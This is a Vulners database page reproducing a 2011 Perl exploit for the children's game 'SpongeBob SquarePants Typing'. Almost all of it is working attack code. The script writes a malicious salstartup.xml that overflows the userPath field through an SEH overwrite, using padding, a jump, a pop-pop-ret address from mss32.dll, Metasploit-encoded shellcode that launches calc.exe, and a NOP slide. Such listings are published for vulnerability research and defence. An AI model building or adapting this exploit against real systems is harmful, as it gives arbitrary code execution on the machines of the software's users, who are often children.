Vulners
Lucene search
SpongeBob SquarePants Typing Buffer Overflow (SEH)
# SEH overwrite exploit for SpongeBob SquarePants Typing
# from The Learning Company (http://goo.gl/1EHaD)
# Date: May 4th 2011
# Author: Infant Overflow
#
# .-.
# ) (
# - -
# |_____|
# / \
# | ~~~ |
# | ~~~~~ |
# | ~~~~~ |
# | ~~~~~ |
# \_______/
#
# Fresh out the womb laying the smack down on SpongeBob
# I like my sploits like I like my milk... fresh
#
# Shoutz to Pops, Elmo, my girl Dora, Handy M, and Thomas the Mother f'n Train
#
# Tested on WinXP SP3
my $diaper = "A" x 1024; # Everyone needs some padding
my $jumprope = "\xeb\x06\x90\x90"; # jump 6
my $pacifier = pack('V',0x2110234D); # pop pop ret from mss32.dll <-- no /SAFESEH sucks like my pacifier!
# windows/exec - 247 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=c:\windows\system32\calc.exe
my $shellcode =
"\xd9\xf6\xba\x24\xb5\x20\x67\xd9\x74\x24\xf4\x5f\x2b\xc9" .
"\xb1\x38\x31\x57\x17\x03\x57\x17\x83\xcb\x49\xc2\x92\xef" .
"\x5a\x8a\x5d\x0f\x9b\xed\xd4\xea\xaa\x3f\x82\x7f\x9e\x8f" .
"\xc0\x2d\x13\x7b\x84\xc5\xa0\x09\x01\xea\x01\xa7\x77\xc5" .
"\x92\x09\xb8\x89\x51\x0b\x44\xd3\x85\xeb\x75\x1c\xd8\xea" .
"\xb2\x40\x13\xbe\x6b\x0f\x86\x2f\x1f\x4d\x1b\x51\xcf\xda" .
"\x23\x29\x6a\x1c\xd7\x83\x75\x4c\x48\x9f\x3e\x74\xe2\xc7" .
"\x9e\x85\x27\x14\xe2\xcc\x4c\xef\x90\xcf\x84\x21\x58\xfe" .
"\xe8\xee\x67\xcf\xe4\xef\xa0\xf7\x16\x9a\xda\x04\xaa\x9d" .
"\x18\x77\x70\x2b\xbd\xdf\xf3\x8b\x65\xde\xd0\x4a\xed\xec" .
"\x9d\x19\xa9\xf0\x20\xcd\xc1\x0c\xa8\xf0\x05\x85\xea\xd6" .
"\x81\xce\xa9\x77\x93\xaa\x1c\x87\xc3\x12\xc0\x2d\x8f\xb0" .
"\x15\x57\xd2\xde\xe8\xd5\x68\xa7\xeb\xe5\x72\x87\x83\xd4" .
"\xf9\x48\xd3\xe8\x2b\x2d\x2b\xa3\x76\x07\xa4\x6a\xe3\x1a" .
"\xa9\x8c\xd9\x58\xd4\x0e\xe8\x20\x23\x0e\x99\x25\x6f\x88" .
"\x71\x57\xe0\x7d\x76\xc4\x01\x54\x15\xd0\xa1\x20\xb3\x4a" .
"\x3e\xa0\x34\xe1\xe2\x4d\xc2\x76\x6f\xd7\x59\x4b\xbd\x4b" .
"\xc1\xca\xad\x10\x2b\x69\x56\xb2\x33";
my $rattle ='<?xml version="1.0" standalone="yes"?>
<startup>
<userPath>"';
my $playpen = '"</userPath>
<cdName>"SpongeBob SquarePants Typing"</cdName>
<cdAge>7-10</cdAge>
<music>1000</music>
<pdfInstaller>"E:\INSTALL\ACROBAT\Ver50\Acrobat Reader 5 Installer.exe"</pdfInstaller>
<signin>
<execute>yes</execute>
<style>tlc</style>
<age>4To6</age>
<rscFile>default</rscFile>
</signin>
<disk1>
<filename>E:\TLC\383167-CD</filename>
<cdName>"SpongeBob SquarePants Typing"</cdName>
</disk1>
<screenRSC>salstartup.rsc</screenRSC>
<screen>
<element>
<condition>all</condition>
<type>scene</type>
<id>9100</id>
</element>
<element>
<condition>all</condition>
<type>toon</type>
<x>0</x>
<y>0</y>
<id>9100</id>
<startFrame>1</startFrame>
</element>
<mainPlayButton>
<condition>all</condition>
<type>fob</type>
<class>play</class>
<cdCheck>disk1</cdCheck>
<target>"C:\Program Files\The Learning Company\SpongeBob SquarePants Typing\SPT.exe"</target>
<postLaunch>wait</postLaunch>
<x>461</x>
<y>60</y>
<id>9124</id>
</mainPlayButton>
<helpButton>
<condition>all</condition>
<type>fob</type>
<class>extension</class>
<cdCheck></cdCheck>
<target>"C:\Program Files\The Learning Company\SpongeBob SquarePants Typing\User's Guide.pdf"</target>
<parameters></parameters>
<postLaunch>wait</postLaunch>
<x>543</x>
<y>158</y>
<id>9126</id>
</helpButton>
<uninstallButton>
<condition>all</condition>
<type>fob</type>
<class>uninstall</class>
<target>C:\WINDOWS\TLCUninstall.exe</target>
<parameters>-l</parameters>
<crc>"C:\Program Files\The Learning Company\SpongeBob SquarePants Typing\Uninstall.xml"</crc>
<postLaunch>exit</postLaunch>
<x>514</x>
<y>373</y>
<id>9125</id>
</uninstallButton>
<onlineButton>
<condition>all</condition>
<type>fob</type>
<class>link</class>
<cdCheck></cdCheck>
<target>http://redirect.expressit.com/redirect.asp?resku=383167&action_id=Launcher</target>
<parameters></parameters>
<postLaunch>wait</postLaunch>
<x>538</x>
<y>263</y>
<yy>375</yy>
<id>9130</id>
</onlineButton>
<EregButton>
<condition>all</condition>
<type>fob</type>
<class>install</class>
<cdCheck></cdCheck>
<target>"C:\Program Files\The Learning Company\SpongeBob SquarePants Typing\ereg\ereg32.exe"</target>
<parameters></parameters>
<postLaunch>wait</postLaunch>
<x>522</x>
<y>324</y>
<id>9129</id>
</EregButton>
<SellScreen>
<condition>all</condition>
<type>fob</type>
<class>link</class>
<cdCheck>disk1</cdCheck>
<target>startup:startup/BrandingPage</target>
<parameters></parameters>
<postLaunch>wait</postLaunch>
<x>543</x>
<y>207</y>
<id>9128</id>
</SellScreen>
</screen>
<BrandingPage>
<element>
<condition>all</condition>
<type>toon</type>
<id>5000</id>
</element>
<screenSaverButton>
<condition>all</condition>
<type>fob</type>
<class>install</class>
<cdCheck>disk1</cdCheck>
<target>E:\SailorificStuff\sbscreen_setup.exe</target>
<parameters></parameters>
<postLaunch>wait</postLaunch>
<x>546</x>
<y>188</y>
<id>5054</id>
</screenSaverButton>
<backButton>
<condition>all</condition>
<type>fob</type>
<class>link</class>
<target>startup:startup/screen</target>
<x>537</x>
<y>263</y>
<id>5055</id>
</backButton>
</BrandingPage>
<sysReq>
<execute>yes</execute>
<pc>
<processor>
<family>pentium</family>
<speed>266</speed>
<msgType>warn</msgType>
<msgText>"266 MHz Pentium or faster is recommended."</msgText>
</processor>
<os>
<Win95>no</Win95>
<Win98>yes</Win98>
<WinMe>yes</WinMe>
<WinNT4>no</WinNT4>
<Win2000>yes</Win2000>
<WinXP>yes</WinXP>
<msgType>warn</msgType>
<msgText>"You operating system is not supported. Play at your own risk!"</msgText>
</os>
<diskSpace>
<mbAvailable>100</mbAvailable>
<msgType>ignore</msgType>
<msgText>"There is not enough hard disk space available to play!"</msgText>
</diskSpace>
<physicalRAM>
<mbAvailable>64</mbAvailable>
<msgType>warn</msgType>
<msgText>"There is not enough RAM available to play!"</msgText>
</physicalRAM>
<availableRAM>
<mbAvailable>64</mbAvailable>
<msgType>warn</msgType>
<msgText>You are low on memory!</msgText>
</availableRAM>
<display>
<width>800</width>
<height>600</height>
<bits>16</bits>
<msgType>fail</msgType>
<msgText>"Your display is not capable of 800 x 600 16-bit, thousands of colors."</msgText>
</display>
<sound>
<msgType>fail</msgType>
<msgText>"WAVE driver is not available."</msgText>
</sound>
</pc>
<mac>
<processor>
<family>ppc</family>
<speed>233</speed>
<msgType>warn</msgType>
<msgText>"233 MHz Powerpc or faster is recommended."</msgText>
</processor>
<os>
<minVersion>0860</minVersion>
<msgType>fail</msgType>
<msgText>"You must run System 8.6 or above!"</msgText>
</os>
<osX>
<minVersion>1004</minVersion>
<msgType>fail</msgType>
<msgText>"You must run OSX 10.04 or above!"</msgText>
</osX>
<diskSpace>
<mbAvailable>100</mbAvailable>
<msgType>ignore</msgType>
<msgText>"There is not enough hard disk space available to play!"</msgText>
</diskSpace>
<physicalRAM>
<mbAvailable>64</mbAvailable>
<msgType>warn</msgType>
<msgText>"There is not enough RAM available to play!"</msgText>
</physicalRAM>
<availableRAM>
<mbAvailable>0</mbAvailable>
<msgType>warn</msgType>
<msgText></msgText>
</availableRAM>
<colorDepth>
<minBits>16</minBits>
<msgType>warn</msgType>
<msgText>"Your display is not capable of 16-bit, thousands of colors."</msgText>
</colorDepth>
<sound>
<available>ignore</available>
<msgType>ignore</msgType>
<msgText></msgText>
</sound>
</mac>
</sysReq>
</startup>';
my $slide = "\x90" x 1000;
open(myfile,'>salstartup.xml');
print myfile $rattle.$diaper.$jumprope.$pacifier.$shellcode.$slide.$playpen;
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1